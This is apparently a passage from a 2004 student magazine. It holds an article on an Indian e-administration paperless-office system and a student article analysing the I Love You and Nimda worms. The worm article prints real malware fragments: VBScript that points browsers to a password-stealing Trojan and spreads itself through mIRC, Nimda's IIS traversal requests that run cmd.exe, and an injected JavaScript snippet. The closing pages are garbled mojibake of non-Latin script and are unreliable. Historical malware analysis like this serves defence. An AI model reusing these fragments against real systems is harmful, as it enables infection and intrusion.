establishing new industrial units andprocedures will be simplified to obtain licence permission to start units We will continue topursue the policies of promoting pollution freeless water and less power consuming industriesin our Union Territory

Item 20 of the speech reads as followsIndustrial Guidance Bureau with

integrated e-Platform has been established bysubstituting single window clearance system tospeed up the process of industrial clearance permission for setting up of new industrial unitsA total of 21 Departments includingMunicipalities Commune Panchayats havebeen integrated with a dedicated electronicnetwork for granting permission to set up anindustry and also to commence production

This saves a lot of time effort and cost toindustrialists and citizens as well as officials ofvarious Departments As against submitting 10copies of documents in the manual system inthe electronic system only one signed copy needsto be submitted thereby saving 90 of paperresulting in conserving of natural forestresources

A unique initiative being attempted for thefirst time in India 21 Departments includingmunicipalities and Panchayats are connectedon a simple dial-up The central repository serverwill be located at the District Industries CentrePondicherry This will form a dedicatedelectronic network The network will allow theGovernment to grant permission for example toset up an industry it can also help amanufacturing unit obtain a Licence tocommence production etc

Says Krishnan This would save a lot oftime effort and cost to industrialists and citizensas well as officials of various Departments As

opposed to submitting 10 copies of documentsin the manual system in the electronic systemonly one signed copy needs to be submittedthereby helping save paper It can help to fuelinvestment in the State and generateemployment for local people

Such an integrated e-Platform can be usedby the ministries and Undertakings of theCentral Government as well as various StateGovernments where ever multiple agencies areinvolved in scrutinizing applications andgranting time bound clearances for planapproval building constructions setting-upindustries etc It can bring about the muchdesired transparency and accountability

Various Central and State GovernmentDepartments and Undertakings including theAndhra Pradesh Technology Services theGovernments of West Bengal Orissa ManipurGoa etc State Bank of India the CanadianConsulate in Chennai British Trade Office(Bangalore) Ministry of Industrial DevelopmentMalaysia and the State of Sarawak Malaysiahave shown interest in e-Administration aweb enabled solution developed using opensource This can considerably cut down thebudget expenditure for e-Governance accordingto Krishnan

Instead of resting on their laurels LL2Bplans to reach out to the various GovernmentDepartments and Undertakings as well asCorporates SMEs and NGOs by implementingtheir solutions in as many public and privateorganisations as possible in India and thedeveloping world by offering the basic solutionfree and charging only for the customisationinstallation training hand holding annualmaintenance and upgrade support eitherdirectly or through ELCOT with whom LL2Bhas a marketing tie-up This is expected to benefit

OITS-2004

36

vastly Governments in India and the developingworld by saving on e-Governance expenditureWe are currently holding discussions with theChennai Metropolitan Development Authority(CMDA) and The Tamil Nadu Dr MGRMedical University to implement e-Administration in their offices institutionsacross the city says Krishnan

Shri D Jayakumar the Hon Minister forIT Govt of Tamil Nadu had stated in the StateAssembly

The Government has also decided to takeup development of four generic softwares paperless office electronic delivery of servicesdevelopment of government portal andintegrated district information system

Of these the paperless office was alreadyin place in ELCOT

While its naiumlve to believe that e-Administration paperless office solutions likeLL2Bs may just be the panacea for our red-taperidden bureaucracy it certainly is a step in theright direction one small step for e-governance a giant leap for democracy

Why ELCOT took the plunge

1 The number of major departments 42 The average number of files generated per

department per year 1503 The average number of physical

movements per file 204 The average number of cycles per file from

start to end 8The total number of manual entries file

movement from desk-to-desk per year4x150x20x8 = 96000 manual entries or filemovements per year

The workload is not evenly distributed asit depends on a hierarchy for granting sanctionandor approval of files The Managing Director(MD) typically has to view and approveapproximately 200 files per week That is anaverage of 40 files per working day This is apartfrom the various meetings he has to attend Filespile up when he is on tour and he is forced tocarry work home When the officer is away filesare kept pending The officer may not even knowthat there are files pending even if they are urgentThese problems cause inordinate delays in theworkflow process A tool such as e-Administration ensures prompt disposal of filesand access to a central database where the statusof files can be monitored at every stage thusensuring efficiency and transparency

Sudeep Jain MD ELCOT confirms thatwhile average cycle time for file approval wasearlier 15 to 21 days after the implementationof the electronic system it was brought down to5 to 7 days

Source E-ADMINISTRATION THE KEY FOR E-GOVERNANCE - INITIATIVES FORCREATING A PAPERLESS OFFICE bySudeep Jain IAS Managing Director ELCOTChennai-35 presented at the 7th National e-Gov Conference in Nov 2003 conducted by theDepartment of Administrative Reforms andPublic Grievances Ministry of PersonnelPublic Grievances and Pension Govt of India

Further enquiries on e-Administration or onimplementing e-Governance Corporate Governancemay be addressed to Mr Krishnan at krisdevgamilcom

OITS-2004

37

Intruders who access networks and systems without authorization or inside attackers withmalicious motives can plant various types of programs to cause damage to the network Theseprograms often lumped together under the general term viruses although other varieties have costcompanies and individuals billions of dollars in lost data lost productivity and the time andexpense of recovery Some of the more destructive examples of malicious code also sometimesreferred to as malware [MALicious softWARE - mark the uppercase MALWARE] over the pastdecade are CIHChernobyl Melissa Code Red Nimda Klez

Now Im going to explain about the two most popular malwares - some exploits which thesemalwares used but NOT how the whole code worked or how to code a malware to exploit

I Love You Worm

The I Love You virus is a little more bulky so I chose not to include the entire script here Youcan download all of the I Love You source from httpwwwpacketstormsecurityorgviral-dblove-letter-sourcetxt

What is interesting to note about the I Love You virus is that it randomly changed the usersdefault Web browser homepage to one of four locations as seen here by the code

num = Int((4 Rnd) + 1)if num = 1 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~young1sHJKhjnwerhjkxcvytwertnMTF wetrdsfmhPnjw6587345gvsdf7679njbvYTWIN-BUGSFIXexe

elseif num = 2 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~angelcatskladjflfdjghKJnwetryDGF ikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4wWIN-BUGSFIXexe

elseif num = 3 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~koichijf6TRjkcbGRpGqaq198vbFV5hfFE kbopBdQZnmPOhfgER67b3VbvgWIN-BUGSFIXexe

elseif num = 4 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~chusdgfhjksdfjklNBmnfgkKLHjkqwtuHJB hAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234 iuy7thjgWIN-BUGSFIXexe

end ifend if

Known Malware ExploitationAbhishek Bhuyan

KIIT Student

OITS-2004

38

The WIN-BUGSFIXexe turned out to be a Trojan application designed to steal passwordsNow a quick look notices all of the URLs present are on wwwskyinetnet This resulted in manyplaces simply blocking access to that single host While bad for skyinetnet it was an easy fix foradministrators Imagine if the virus creator has used more popular hosting sites such as the membershomepages of aolcom or even made reference to large sites such as yahoocom and hotmailcom would administrators rush to block those sites as well Perhaps not Also had someone at skyinetnetbeen smart they would have replaced the Trojan WIN-BUGSFIXexe with an application that woulddisinfect the system of the I Love You virus That is if administrators allowed infected machinesto download the Trojaned Trojan

I Love You also modifies the configuration files for mIRC a popular Windows IRC chat clientif (s=mirc32exe) or (s=mlink32exe) or (s=mircini) or(s=scriptini) or (s=mirchlp) thenset scriptini=fsoCreateTextFile(folderspecampscriptini)

scriptiniWriteLine [script]scriptiniWriteLine mIRC ScriptscriptiniWriteLine Please dont edit this script mIRC will corrupt if mIRC willscriptiniWriteLine corrupt WINDOWS will affect and will not run correctly thanksscriptiniWriteLine scriptiniWriteLine Khaled Mardam-BeyscriptiniWriteLine httpwwwmirccomscriptiniWriteLine scriptiniWriteLine n0=on 1JOINscriptiniWriteLine n1= if ( $nick == $me ) halt scriptiniWriteLine n2= dcc send $nick ampdirsystemampLOVE-LETTER-FOR-YOUHTMscriptiniWriteLine n3=scriptinicloseHere we see I Love You making a change that would cause the users IRC client to send a copy

of the I Love You virus to every person who joins a channel that the user is in Of course the filenamehas to be enticing to the users joining the channel so they are tempted into opening the file- Nimda Worm -

In September 2001 a very nasty worm reared its ugly head The Nimda (Just reverse nimdaand you get admin) worm also called the Concept viruswas another worm which propagated viaMicrosoft hostsNimda featured multiple methods to infect a host

It could send itself via e-mail It would attach itself as an encoded exe file but would use anaudiox-wave Multipurpose Internet Mail Extensions (MIME) type which triggered a bug in InternetExplorer to automatically execute the attachment upon previewing the e-mail Once the attachmentwas executed the worm would send itself to people in the users address book as well as e-mailaddresses found on Web pages in Internet Explorers Web page cachethat means the worm wouldactually find e-mail addresses on recently browsed Web pages The worm would scan for vulnerableIIS machines looking for the rootexe files left over from the Code Red II and Sadmind worms aswell as using various Unicode and double-encoding URL tricks in order to execute commands onthe serverThe following is a list of requests made by the worm

GET scriptsrootexec+dir

OITS-2004

39

GET cwinntsystem32cmdexec+dirGET dwinntsystem32cmdexec+dirGET MSADCrootexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scriptsxc1x1cwinntsystem32cmdexec+dirGET scriptsxc0winntsystem32cmdexec+dirGET scriptsxc0xafwinntsystem32cmdexec+dirGET scriptsxc1x9cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scripts2fwinntsystem32cmdexec+dirGET _vti_bin5c5c5cwinntsystem32cmdexec+dirGET _mem_bin5c5c5cwinntsystem32cmdexec+dirGET msadc5c5c5cxc1x1cxc1x1cxc1x1cwinntsystem32

cmdexec+dirOnce the worm found a vulnerable IIS server it would attempt to Trivial File Transfer Protocol

(TFTP) the worm code to the target server It would also modify the IIS server by creating a guestaccount and adding it to the Administrators group It would also create a Windows share of theC drive (using the name C$)

All local hypertext markup language (HTML) and Application Service Provider (ASP) fileswould be modified to include the following code snippet

ltscript language=JavaScriptgtwindowopen(readmeeml null resizable=notop=6000left=6000)ltscriptgtIn addition the worm would copy itself to the readmeeml file The final result was that

unsuspecting Web surfers would automatically download and possibly execute the worm froman infected Web site

The worm copies itself into EML and NWS in various local and network directories If anunsuspecting user uses Windows Explorer to browse a directory containing these files it is possiblethat the automatic preview function of Explorer would automatically execute the worm This wouldallow the worm to propagate over file shares on a local network

The worm also copies itself to richeddll which is an attempt to Trojan Microsoft Officedocuments since documents opened in the same directory as the richeddll binary will load andexecute the Trojan DLL

The end result was a noisy but very effective worm It was noisy because it created many EMLand NWS files on the local system It also modified Web pages on the Web site which made it easyto remotely detect a compromised server But the multi-infection methods proved quite effective andmany people who had run through and removed the worm had found that their systems keptgetting infectedit is a tough worm to fully eradicate To properly combat it the securityadministrator needed to patch their IIS server upgrade their Microsoft Outlook client and be cautiousof browsing network shares Full information on the Nimda worm is available in the Security Focusanalysis

httparissecurityfocuscomalertsnimda010921-Analysis-Nimda-v2pdf

OITS-2004

40

Some tips on prevention and responseProtecting systems and networks from the damage caused by Trojan horses viruses and

worms is mostly a matter of common sense Practices that can help prevent infection include thefollowing Do not run executable (EXE) files from unknown sources including those attached to an e-

mail or downloaded from web sites Turn off the Preview andor HTML mail options in the e-mail client program Do not open Microsoft Office documents from unknown sources without first disabling

macros Be careful about using diskettes that have been used in other computers Install and use firewall software Install antivirus software configuring it to run scans automatically at predefined times and

updating the definition files regularly Use intrusion prevention tools called behavior blockers that deny programs the ability to

execute operations that have not been explicitly permitted Use integrity checker software (such as Tripwire) to scan the system for changes Recognizing the presence of a malicious code is the first-response step if a system gets infected

Administrators and users need to be on the alert for common indications that a virus mightbe present such as the followingMissing files or programsUnexplained changes to the systems configurationUnexpected and unexplained displays messages or soundsNew files or programs that suddenly appear with no explanationMemory leaks (less available system memory than normal)Unexplained use of disk spaceAny other odd or unexplained behavior of programs or the operating system

- If a virus is suspected a good antivirus program should be installed and run to scan thesystem for viruses and attempt to remove or quarantine any that are found Finally allmission-critical or irreplaceable data should be backed up on a regular basis in case all thesemeasures fail

Virus writers are a creative and persistent bunch and will continue to come up with new waysto do the impossible so computer users should never assume that any particular file type or OSis immune to malicious code The only sure way to protect against viruses is to power down thecomputer and leave it turned off -)

Information about specific viruses and instructions on how to clean an infected system isavailable at httpwwwsymanteccom and httpwwwmcafeecom Both antivirus vendorsprovide detailed databases that list and describe known viruses But I recommend being touch withthe site httpwwwsecuritynewsportalcom here you will get hourly updates about latest securityhacking virus and trojan news

luckylucky-webnethttpwwwlucky-webnet

Orissa Network Security Group httpgroupsyahoocomgrouporissa-netsec

OITS-2004

41

LOtilde`EcircOcircVethornethorn S_ecirc J aTHORNLETHhOgraveSOcircETH[THORN eamp_ OgravekthornETH[ETH

LTHORNVccedil XTHORNcccedilXccedil aTHORNhegraveaTHORN]OcircETHfmacrAElig bEcircthornaOgrave_hegraveethorn

ASTHORNLETHmTHORNthorn LfETH aTHORNsETH_ aETHZTHORNSOcirc ethornETHS_Ntilde[THORNHaOtilde agrave_Ntilde[THORN A]THORN jcordfAElig Ogravel[oumlOgraveethorn LOtilde`EcircOcircVeethornthornakEcircthornf aOcircakthornETHethorn OgravekthornDRTHORNfrac14frac14ETH Ograve[ZEcirc HkTHORNthorn dsectAEligVTHORNaTHORNimacrAEligOgraveethorn LTHORNRTHORN SETHZTHORNaETH Acethorn jETHcETHSTHORNL LragravethornaOcircfrac14frac14ETHd]THORNJ LOtilde`EcircOcircVethorn aTHORNsETH_ HL A^Ecirc_THORNL aTHORN]OcircETHbthornETHaOgraveethorn `eTHORNthornNZTHORN[ HkthornETH `EcircethornETH[_ dEcircNeEcircthorn aTHORNhegraveethornjcordfAElig aTHORN]OcircETHOgraveethorn Aacutecurren akEcircthornOgrave[ D`OgravedETHN OgravekthornETHBAjEcircRTHORNfrac14frac14ETH HL]ETH SOgraveZ XETHbrvbarAEligethorn SOgraveZ LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL HaOtilde jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14 c^OcircOgraveethorn aTHORNaETH]mthornETHNTHORNmthornETHfrac14frac14ETH XETHbrvbarAEligethorn dEcircbrvbarTHORNAEligLOgravemthorn bthornNaETH_ccedil A]ETHcccedilEcircfrac14NYIumlTHORNOgravemthornfrac14frac14ETH Bbccedilthorn OgraveplusmnAEligETH`QETHethorn cETH^OcirccOgraveethorn A]ETHcccedilfrac14NbagravethorneEcircthorn AaTHORNbagravethornETHa OgravekthornOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn joacutefrac12THORNcurrenaYIumlTHORNQETHmTHORNthornmthornETHfrac14frac14ETH Ograve[ZEcirc XETHbrvbarAEligethornNtilde aTHORN]OcircETH kUacutethorn jaagrave EcircethornETH[_frac14frac14ETHHkthornETH hEcircZTHORN jTHORNbTHORNthornmccedilthorn dsectAEligNtilde LkTHORNthornOgravemthorn _UumlETH _UumlETH bthornNaETH_ccedil`otildeOgravec jegraveNagraveLEcirc _THORNcagraveETHZ LOgravemthornfrac14frac14ETH HkthornETH`Ograveethorn `oacuteTHORNaNtildejoacutefrac12THORNcurren OgravekthornmthornETHfrac14frac14ETH OgravejTHORN ETHBUuml jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14ethornAahOcircL[ETH OgravekthornETHBTHORNmthornETHfrac14frac14ETH Ograve[ZEcirc jTHORNbTHORNthornmccedilthorn BampTHORNfrac14_THORN AEligeTHORNOtildethornOgravekthornDRTHORN jaagrave EcircethornETH[_ aTHORN]OcircETHfrac14frac14ETH jaEcirc hEcircZTHORN LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL Aacutecurren kthornjTHORN Drthornethorn Ograve]Ogravemthorn A`ZcETHOgrave_`otildeOgrave[OcircL aTHORN]OcircETHLEcirc HL _THORN~Ugravefrac12curren LotildecOgraveethorn `otildeLETHhLeEcircthornRlaquoTHORNAEligAEligfrac14frac14ETH agraveETH[ccedil HL LETHdagraveOcirc jeTHORNthornaETH `Ograveethorn ]eacuteTHORN[NtildemacrAEligLETHdagraveOcirc LeTHORNthornaETHethorn `w[THORN OgraveLDUuml aTHORN]OcircETHOgraveethorn ethornkTHORNthornRTHORN HkthornETH hEcircZTHORNaETH`Ograveethorn XETHbrvbarAEligethorn HaOtilde jTHORNbTHORNthornmccedilthorn BOtildeSTHORN_THORN AEligethornordfAElig AEligAElig OgravekthornETHB dETHBTHORNOgravemthornfrac14frac14ETH HkthornETHkUacutethorn LOtilde`EcircOcircVethorn aTHORN]OcircETHethorncEumlfcsectAEligfrac14frac14ETH LOtilde`EcircOcircVethornethorn aTHORNaragravethorn_LEcirc _Ecirc OcircETH_ LOgravemthorn

AOgravecdividecETHOgrave_ SETHZTHORN ETHeTHORNthornaETH Ograved A^Ecirc_THORNL LOtilde`EcircOcircVethornethornS_L OgravekthornDRlaquoTHORNAEligAElig QETHmccedilthornjagrave aOcircETHOgraveaSccedilfrac14frac14ETH Ogravej 1834cjTHORNkthornETHOgraveethorn A_ETHmTHORNthornVTHORNLETHmccedilthorn BampTHORNfrac14_ccedil _ETHcLLOtilde`EcircOcircVethornVTHORNH DiexclthornETHa_ LeTHORNthornBOgravemthornfrac14frac14ETH `Ograveethorn `OgraveethornS_ccedil bTHORNthorn_THORNOgravejAtildeccedilcurren AVETH_ETHj$ccedilfrac14 HaOtilde LiacuteTHORNOgrave$frac14ETHXagraveIuml OgraveaeTHORNthorncTHORNhTHORN ABgETH Ogravefrac12currenVccedil macrEcircAElig_THORNbthornethornjTHORNVTHORNOgraveethorn `otildecBOgravemthornOgraveIacuteAEligETH_THORNLccediljccedil (Electronics) LOtilde`EcircOcircVethorn[THORNAeTHORNthorn LeTHORNthornTHORNOgravemthornfrac14frac14ETH HkTHORNthornWETHOgraveethorn kUacutethorn $frac14ETHfrac12currenOgraveSOgrave_Ograveethornj_ccedil (First Generation)LOtilde`EcircOcircVethornethorn S_ecirc OgravekthornETHBTHORNmthornETHfrac14frac14ETH ]eacuteTHORN[NtildemacrAElig aTHORNhegravedEcircwjcmacrAEligOgraveethorn H_THORNALccedil (ENIAC) LOtilde`EcircOcircVethorn _THORNcUgrave[OgravekthornETHBTHORNmthornETHfrac14frac14ETH 1946 cjTHORNkthornETHOgraveethorn _THORNcUgrave[ HkTHORNthornLOtilde`EcircOcircVethornLEcirc ethornMTHORNaETH `ETHBUuml 50 $Ecircfrac14Vccedil x 30 $Ecircfrac14VccedilOethornethorn AahOcircL[ETH OgravekthornETHBTHORNmthornETH HaOtilde HkthornETHethorn JS_THORNmthornETH 30 V_ccedilfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornOgraveethorn 18000bthornOcircETHLEcirccccedil VEcircOcircaccedil (Vaccum tube) mthornETHNTHORNTHORNmthornETHfrac14frac14ETHHkthornETH HL OgravejOgraveLumlAEligOgraveethorn 5000 `dagraveOcirclaquoAElig cTHORNhETHZ(Addition) LeTHORNthorn `ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETH c_EcirciOcircWETHeEcircthorn[OcirclaquoAEligAElig lTHORN otilde THORNmthornETHfrac14 j[ cETH[ouml aragravethorncETH_ethornLOtilde`EcircOcircVethornWETHeEcircthorn dOgravefrac12curren cxethorn THORNmthornETHfrac14frac14ETH `Ograveethorn `Ograveethorn1948 cjTHORNkthornETHOgraveethorn HLVagrave HaOtilde cOcircETHLccedilOgravemthorn cTHORNhTHORNHXccedilbthornETHLccedil (EDVAC) _ETHcL HL D_iuml[cETH_ethornLOtilde`EcircOcircVethornVTHORNH Ograve`_ccediljTHORNmccedilthornbthornETH_THORNAUuml aTHORNhegraveaTHORN]OcircETHfmacrAEligOgraveethornDiexclthornETHa_ LOgravemthornfrac14frac14ETH 1951Ograveethorn ]EcircOgravekthornUuml cTHORNhTHORN Ogravej_ccediljjccedilaEcircOcircOgraveethornETH (Census beaureau)Ograveethorn aOcircakthornETHethorn

OITS-2004

42

`ETHBUuml macrEcircAElig_THORNbthornETHLccedil LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LOgravemthornfrac14frac14ETH HTHORNOgraveethornQEcirccegraveLNtildemacrAElig OgraveV`ccedilOgraveethorn [Ocirc ethornkTHORNthornaETH Aethorncdivide OgravekthornmthornETHfrac14frac14ETHHkthornETH OgravekthornDRTHORN `otildec aOcircajETHmacrTHORNAEligL bTHORNthornrTHORNthornOgraveethorn aOcircakoacutethorn[LOtilde`EcircOcircVethornfrac14frac14ETH HkTHORNthorn `otildec `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn [oacuteVTHORNdEcircbrvbarAEligTHORNmthornETH HaOtilde Ograve_L SETHNETH cETHXIumlTHORN ajEcircTHORNmthornETHfrac14frac14ETH 1947cjTHORNkthornETHOgraveethorn Ograveamccedilthorn mthornETHOgraveaETHOgraveethornOgraveVETHeTHORNthornOgraveethorn (Bell Lab)VoumlETH_ccedilSTHORNfrac12currenethornethorn DiexclthornETHa_ OVTHORNTHORNmthornETHfrac14frac14ETH bthornOcircETHLEcirccccedil VEcircOcircaccedila]fOgraveethorn VoumlETH_ccedilSTHORNfrac12currenethornethorn aOcircakthornETHethorn ]eacuteTHORN[NtildemacrAElig `THORNYIumlNtildeethornLOtilde`EcircOcircVethornLEcirc S_ecirc Ograve]mthornETHfrac14frac14ETH Lcccedil Mnagrave OgraveRETHV ALETHethornHaOtilde ^THORNL aTHORNhegraveordfAElig OgravekthornETHBTHORNaETHeEcircthorn HkTHORNthorn `THORNYIumlNtildeethornLOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBmthornETHfrac14frac14ETH cETH[ouml NETHZTHORN[THORNLHaOtilde aOcircajETHmacrTHORNAEligL aTHORNOgravehyacuteiZ `ETHBUuml ]EcircB`otildeLETHethornethorn`w[THORN aOcircakoacutethorn[ OgravekthornDTHORNmthornETH dETHkthornETHLTHORN [OcirclaquoAEligAElig MnagraveETHlaquoAEligAEligaOcircETH`ETHethorn THORNmthornETHfrac14frac14ETH 1958Ograveethorn BAtildeTHORNcurrenOgraveNotildeOgraveVXccedil jLUgraveVccedil(Integrated circuit) DiexclthornETHaTHORN[ OgravekthornaETH`OgraveethornXTHORNSTHORNVETHmccedilthorn LOgrave`agraveETHOgraveethornj_ccedil (DigitalCorporation) OgraveNETHVTHORNH cTHORN_THORN LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETH dETHkthornETHLTHORN 15000 XmthornETHethornccedilOgraveethorn aTHORNLotildeTHORNOgravekthornETHBTHORNmthornETHfrac14frac14ETH `Ograveethorn ABaTHORNHcccedil (IBM) c^Ocirc[ETHethorn 360 jTHORNeTHORNthornSccedil (series) LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETHfrac14frac14ETH HkTHORNthornjaEcirc LOtilde`EcircOcircVethornNEcircXIumlTHORNL [oacute[NtildemacrAElig `THORNYIumlNtildeLOtilde`EcircOcircVethorn bthornETHaOgraveethorn `eTHORNthornNZTHORN[frac14frac14ETH `otildeOgravecOgrave`otildeETHNotildeETHcccedilethorncETHOgrave_ `iacuteNccedil OgraveaETHXagrave HaOtilde [ETHethorn aOcircakthornETHethornLeTHORNthorn LOtilde`EcircOcircVethorn jkthorn OgravedETHNETHOgravedETHN LeEcircthornTHORNOgravemthornfrac14frac14ETHHTHORNOgraveethorn 0 HaOtilde 1 LEcirc aTHORNbTHORNthorn_iuml YETHqETHOgraveethorn HAtildeoumlTHORNcurrenLethornETHdETHDTHORNmthornETHfrac14frac14ETH `Ograveethorn OgraveLETHamccedilthorn HaOtilde $frac14ethornccedilVoumlETH_ccedil `eTHORNthornbthornETHiETH HkTHORNthorn Lfrac12currenLethorn `w[THORNLEcirc jethornf LeTHORNthornOgrave]mthornETHfrac14frac14ETH1971 cjTHORNkthornETHOgraveethorn BOgraveAtildecurrenmccedilthorn _ETHcL HL LshyAEligETH_NtildecETHBOgraveLotildeETHOgrave`otildeETHOgravejjeccedilthorn (Microprocessor)

[THORNAeTHORNthorn LmthornETHfrac14frac14ETH HkthornETH kthornSETHethorn kthornSETHethorn VoumlETH_ccedilSTHORNfrac12currenethornLEcirc_THORNS c^OcircOgraveethorn HL OgraveRETHV QTHORN ccedil cETH^OcirccOgraveethorn ethornMTHORN`ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETHethorn D`ugraverTHORNthorn kUacutethorn Q[Ecircagrave `THORNYIumlNtildeLOtilde`EcircOcircVethornethorn S_ecirc OVETHBmthornETHfrac14frac14ETH HkthornETHethorn D`OgravedETHNOgravekthornaETH$frac14fOgraveethorn LOtilde`EcircOcircVethornethorn ALETHethorn AhETH[Ntilde[bthornETHaOgraveethorn LcTHORNNmthornETHfrac14frac14ETH Lcccedil Mnagrave HaOtilde ^THORNL OgraveaNHkthornETHLEcirc ^THORNL OgravemthornETHL`otildeTHORN AElig LethornETHBmthornETHfrac14frac14ETH 1981OgraveethornABaTHORNHcccedil (IBM) LshyAEligETH_Ntilde [ETHethorn `otildec`jagrave_ETHmccedilthorn LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornVETHBcccedil cETHNETHSTHORN_ccedil (Time Magazine) HkthornETHLEcircMan of the Year AMOcircETH Ograve]mthornETHfrac14frac14ETH Q[Ecircagrave`THORNYIumlNtildeethorn LOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBaETHeEcircthorn HkthornETHLEcircLTHORN eTHORNthorn Ograve]szlig_tTHORN_ LETHdagraveOcircOgraveethorn aOcircakthornETHethorn LeTHORNthornOgravekthornaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ [`ugraveethorn OgravekthornETHBDWTHORNOgravemthornfrac14frac14ETH1970 eEcircthorn 1980 cjTHORNkthornETH c^OcircOgraveethorn LOtilde`EcircOcircVethornOgravecETHVETHOgravecETHVTHORN bthornETHaOgraveethorn AOgraveceTHORNthornLETHaETHjNtildefrac14ethorn koacutethorn]macrAEligLEcirc^THORNLETHethorn LeTHORNthornjETHeTHORNthornTHORNmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornjEcirc ethorncETHOgraveLagraveVccedilNEcircXIumlTHORNL OgravejcETH_frac14ethorn LETHDAtildecurrenethorn ANOgraveethornLOtilde`EcircOcircVethorn OgraveLETHXIumlTHORNOtilde (Computer coding)OgravekthornETHBTHORNaETH QflaquoAEligETH aOcircETH_ethornccedilcETH_ mthornNETHBaETH AethorncdivideLOgravemthornfrac14frac14ETH

1976 cjTHORNkthornETHOgraveethorn OgraveSOgrave_ethornETHmccedilthorn OgravecETHVethornccediljccedilLshyAEligETH_Ntilde `otildec ethorn `ETHBUuml [ETHethorn LETHethornccedilOgraveethornLOtilde`EcircOcircVethornVTHORNH mthornNETHBmthornETHfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornVTHORN LETHethornccedilethornOgraveaN Ograve[szligfethorn `eTHORNthorncETHZ aOcircETHOgraveVethornNtildeethorn OgravemthornOgravebthornmccedilthornOgrave[szligfethorn QETH` HaOtilde BOtildeSTHORN_ccedilethorn ayETHLEcirc Ograved OgraveLtimesZjTHORNjcmacrAEligOgraveethorn cETH`THORN `ETHeEcircthornTHORNmthornETHfrac14frac14ETH 1978 cjTHORNkthornETHethorn _OcircHL OVZETH jcNotilde `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QcLuacuteIgrave[LeTHORNthornTHORNmthornETHfrac14frac14ETH HkTHORNthornaiagrave OgraveQjccedilethorn NotildeETHumlccedilAElig cETHfrac12currenethorn `THORNVeccedilthorn

OITS-2004

43

aTHORN AEligjTHORNjccedilEcircfrac14 LOtilde`EcircOcircVethorn OgraveQjccedil OgraveMfOgraveethorn kthornethornETHBTHORNmthornETHfrac14frac14ETHaTHORNsETH_ethorn NotildeN[THORN jkthorn jETH^ETHethornZ OgravemthornETHL LTHORN eTHORNthornLOtilde`EcircOcircVethornLEcirc akEcircthornf bthornETHaOgraveethorn aOcircakthornETHethorn LeTHORNthorn ETHeTHORNthornOgraveaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ `otildeOgraveQfrac12currenETH QfETHBOgravemthornfrac14frac14ETHOgraveSethornmicroAElig HaOtilde A`mccedilthorn (Apple) LshyAEligETH_NtildeLOtilde`EcircOcircVethornLEcirc QfETHBaETH`ETHBUuml jkthornS D`ETHmacrAElig aETHkthornETHethornLOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn cETHBOgraveLotildeETHj$ccedilfrac14Vccedil(Microsoft)ethorn Windowsethorn DiexclthornETHa_jETH^ETHethornZ OgravemthornETHLfrac14ethorn QETHkTHORNthorn]ETHLEcirc dOgravefrac12curren aYIumlETHBmthornETHfrac14frac14ETHaragravethorncETH_ccedil AOgravec `qc `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn D`OgraveethornAOgravemthornETHQ_ETH LeTHORNthornaETHfrac14frac14ETH HkthornETHethorn NotildeN[THORN `ETHBUumlOgraveaszligsETH_THORNLcETHOgrave_ ]THORN_ethornETH[THORN NOgraveaiZETH LeTHORNthorn _EumlA _EumlA[Ocirc cETH^OcirccOgraveethorn `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QLTHORN[ LeTHORNthornaETHOgraveethornmthornETHNTHORNRlaquoTHORNAEligAEligfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn cZTHORNi `eTHORNthorn QTHORNlaquoAEligAEligETHLeTHORNthorn ETHOgraveethornfrac14frac14ETH HkthornETH Ograve]MTHORN ETHOgraveethorn lethorn QTHORNkiumlTHORNthorn ETHOgraveethornHaOtilde cZTHORNi `eTHORNthorn _Ecircbthorna LeTHORNthorn ETHOgraveethornfrac14frac14ETH jaEcircWETHeEcircthorncSETHLETH OgravekthornmthornETH HkthornETH hveEcircthorn bTHORNthorn_iuml bTHORNthorn_iuml OgravemthornETHLEcircfrac14QTHORNkiumlTHORNthorn ETHOgraveethorn HaOtilde RaTHORNeEcircthorn c^Ocirc aTHORNOgravehyacuteiZ LeTHORNthorn bTHORNthorn_iuml[ETHaETHeTHORNthorn ETHOgraveethornfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethornOgraveethorn Loacute[oumlTHORNc aEcircwTHORN(Artificial Intelligence)ethorn jkthornETHmacrAElig[ETH_THORNAdETHHfrac14frac14ETH HkTHORNthorn ]ccedilbEumlthorn[ aTHORN]OcircETHethorn `otildeOgravemacrAEligETHN 